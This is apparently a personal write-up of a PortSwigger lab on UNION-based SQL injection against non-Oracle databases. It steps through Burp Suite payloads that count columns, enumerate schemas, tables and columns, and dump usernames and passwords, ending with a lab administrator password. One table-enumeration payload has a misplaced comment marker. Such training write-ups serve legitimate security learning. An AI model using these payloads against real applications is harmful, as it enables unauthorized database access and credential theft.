> For the complete documentation index, see [llms.txt](https://kunalwalavalkar.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kunalwalavalkar.gitbook.io/write-ups/portswigger-labs/server-side-topics/sql-injection/sql-injection-attack-listing-the-database-contents-on-non-oracle-databases.md).

# SQL injection attack, listing the database contents on non-Oracle databases

https\://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FEy6mgp5Sghb39ccMB67h%2F1.png?alt=media&amp;token=d1e270cb-f55f-4800-9447-323fd8e695fe" alt=""><figcaption></figcaption></figure>

Let's filter for `Food & Drink`.

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FN1hr2ZG9nWi6MbZ88Sg4%2F2.png?alt=media&amp;token=949b5219-21a2-482e-b820-6e18a37d09ee" alt=""><figcaption></figcaption></figure>

Since we are proxying the traffic through Burp Suite, we can go to the `Proxy > HTTP History` tab to view this request.

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2F1uUgTJehrQq0v60kzwu4%2F3.png?alt=media&amp;token=bf1da8d7-a659-4561-ad9c-74a37d097485" alt=""><figcaption></figcaption></figure>

Let's forward the request to the `Repeater` for further modification.&#x20;

Once in the `Repeater`, let's set the `category` parameter to the following:

```
' UNION SELECT 'test'--
```

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FQ03YGR0Ul5qJAfbUScv7%2F4.png?alt=media&amp;token=95061c94-0156-43f0-9060-b680af92b787" alt=""><figcaption></figcaption></figure>

Since the application returns an error, we know that the number of columns in the current query is more than 1. Let's set the `category` parameter to the following:

```
' UNION SELECT 'test','test'--
```

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2Fxrf85cErf7zy7oq23QjZ%2F5.png?alt=media&amp;token=afb9da72-11c0-48f4-abf0-7110c84d480a" alt=""><figcaption></figcaption></figure>

Now that we know the current query has two columns, we can start enumerating the databases.

```
' UNION SELECT schema_name, NULL FROM information_schema.schemata--
```

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2Fi4QZSOvJlforln64nHcd%2F20.png?alt=media&amp;token=7a7f897a-6b10-4637-93b4-04eee35f1c52" alt=""><figcaption></figcaption></figure>

Now let's enumerate the tables present in the `public` database by setting the `category` parameter to:

```
' UNION SELECT table_name, NULL FROM information_schema.tables-- WHERE table_schema='public'--
```

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FAaXBWvVJQhfoxPen0clt%2F21.png?alt=media&amp;token=dbb69d21-9b55-4c5f-b783-bf25c676924b" alt=""><figcaption></figcaption></figure>

Next, we need to find the columns present in the `users_bfbtjz` table. We can do that by setting the `category` parameter to the following:

```
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_bfbtjz'--
```

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FUdhyKl9yqjqaFqvWRrrH%2F22.png?alt=media&amp;token=475c5538-11d6-411c-9320-15cd5ab799bd" alt=""><figcaption></figcaption></figure>

We can now retrieve the usernames and password from the `username_ylkdae` and `password_sdbuqk` columns respectively.&#x20;

For that we have to set the `category` parameter to the following:

```
' UNION SELECT username_ylkdae, password_sdbuqk FROM users_bfbtjz--
```

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FzqXZWcXuaPvidbMYJvbt%2F23.png?alt=media&amp;token=126914e0-b693-4fc2-bd7f-0b1ec8a76e6f" alt=""><figcaption></figcaption></figure>

We can now login as the administrator using the following credentials:

| Username      | Password             |
| ------------- | -------------------- |
| administrator | x3lp8yt4oyymkeu9bppm |

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2F85vUHFoa5TAy9sjbw289%2F9.png?alt=media&amp;token=640be500-6306-4035-ac5e-0eb9e145e152" alt=""><figcaption></figcaption></figure>

We have solved the lab.

<figure><img src="https://1586847736-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FtSZ40gLWhBDTzPEgHsVB%2Fuploads%2FX1y640Nxmta2Ljtcdihn%2F10.png?alt=media&amp;token=17efc25d-0320-4d39-91d0-d737ff8020cd" alt=""><figcaption></figcaption></figure>
